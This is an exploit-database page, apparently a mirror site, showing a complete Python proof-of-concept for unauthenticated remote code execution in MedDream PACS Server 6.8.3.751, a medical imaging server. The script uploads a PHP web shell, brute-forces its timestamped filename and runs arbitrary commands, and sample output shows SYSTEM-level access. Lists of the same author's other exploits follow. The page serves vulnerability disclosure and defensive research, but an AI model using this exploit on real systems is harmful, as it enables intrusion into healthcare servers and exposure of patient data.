Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)"

Author

Exploit author

bzyo

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
#!/usr/bin/python
#
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 10-10-2020
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
# Vendor Homepage: https://www.softneta.com
# Version: 6.8.3.751
# Tested On: Windows 2016
#
#
# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
#
##PoC##
#
# 1. create one line php shell to call commands
# 2. run script on attacking machine
# 3. enter parameters; IP, filename, command
# 
#
# root@kali:~# python meddream.py 
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter command: whoami
# 170759
# <pre>nt authority\system
# </pre>
# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#

from urllib2 import urlopen                        
import requests
import sys
import time
from datetime import datetime, timedelta

ip_addr = raw_input("Enter IP Address: ")
user_file = raw_input("Enter payload filename + .php: ")
cmd = raw_input("Enter command: ")

URL= 'http://' + ip_addr + '/Pacs/uploadImage.php'

def main():
    session = requests.Session() 

    files = [
    ('actionvalue', (None, 'Attach', None)),
    ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
    ('action', (None, 'Attach', None)),
    ]
    
    site = session.post(URL, files=files)

    today = datetime.today()
    upload_date = today.strftime("%Y%m%d")

    less = 1
    now1 = datetime.now()
    up_time1 = now1.strftime("%H%M%S")
    print(up_time1)
    #varying time checks +/-
    now2 = now1 - timedelta(seconds=less)
    up_time2 = now2.strftime("%H%M%S")
    now3 = now2 - timedelta(seconds=less)
    up_time3 = now3.strftime("%H%M%S")
    now4 = now3 - timedelta(seconds=less)
    up_time4 = now4.strftime("%H%M%S")
    now5 = now4 - timedelta(seconds=less)
    up_time5 = now5.strftime("%H%M%S")
    now6 = now5 - timedelta(seconds=less)
    up_time6 = now6.strftime("%H%M%S")
    now7 = now6 - timedelta(seconds=less)
    up_time7 = now7.strftime("%H%M%S")
    now8 = now1 + timedelta(seconds=less)
    up_time8 = now8.strftime("%H%M%S")
    now9 = now8 + timedelta(seconds=less)
    up_time9 = now8.strftime("%H%M%S")
    now10 = now1 + timedelta(seconds=less)
    up_time10 = now9.strftime("%H%M%S")


    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]  
    for i in up_time_array: 
        r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
        if r.status_code == 200: 
            print r.content
            print r.url
        else:
            print ("404")

if __name__ == '__main__':
    main()
Release Date Title Type Platform Author
2020-10-27 "Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)" webapps php "Gurkirat Singh"
2020-10-27 "Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)" webapps php "Gurkirat Singh"
2020-10-27 "Client Management System 1.0 - 'searchdata' SQL injection" webapps php "Serkan Sancar"
2020-10-26 "CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection" webapps php "Gurkirat Singh"
2020-10-26 "PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)" webapps php "David Bimmel"
2020-10-26 "InoERP 0.7.2 - Remote Code Execution (Unauthenticated)" webapps php "Lyhin\'s Lab"
2020-10-26 "Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)" webapps php "AkΔ±ner KΔ±sa"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-12 "MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)" webapps php bzyo
2020-10-02 "MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)" webapps php bzyo
2020-04-20 "Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)" local windows bzyo
2019-05-17 "Iperius Backup 6.1.0 - Privilege Escalation" local windows bzyo
2019-05-06 "NSClient++ 0.5.2.35 - Privilege Escalation" local windows bzyo
2019-02-14 "exacqVision ESM 5.12.2 - Privilege Escalation" local windows bzyo
2019-01-30 "10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-28 "Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-11 "Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)" local windows bzyo
2019-01-10 "RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-20 "Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)" local windows bzyo
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-09-12 "SynaMan 4.0 build 1488 - SMTP Credential Disclosure" webapps windows bzyo
2018-09-12 "SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)" webapps windows bzyo
2018-08-06 "AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Privilege Escalation" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)" local windows bzyo
2018-05-06 "HWiNFO 5.82-3410 - Denial of Service" dos windows bzyo
2018-04-24 "RGui 3.4.4 - Local Buffer Overflow" local windows bzyo
2018-04-18 "Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities" webapps xml bzyo
2018-04-17 "Reaper 5.78 - Local Buffer Overflow" local windows bzyo
2018-04-09 "GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)" local windows bzyo
2018-04-02 "WebLog Expert Enterprise 9.4 - Privilege Escalation" local windows bzyo
2018-03-26 "LabF nfsAxe 3.7 - Privilege Escalation" local windows bzyo
2018-03-23 "WM Recorder 16.8.1 - Denial of Service" dos windows bzyo
2018-03-05 "Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow" local windows bzyo
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48868/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.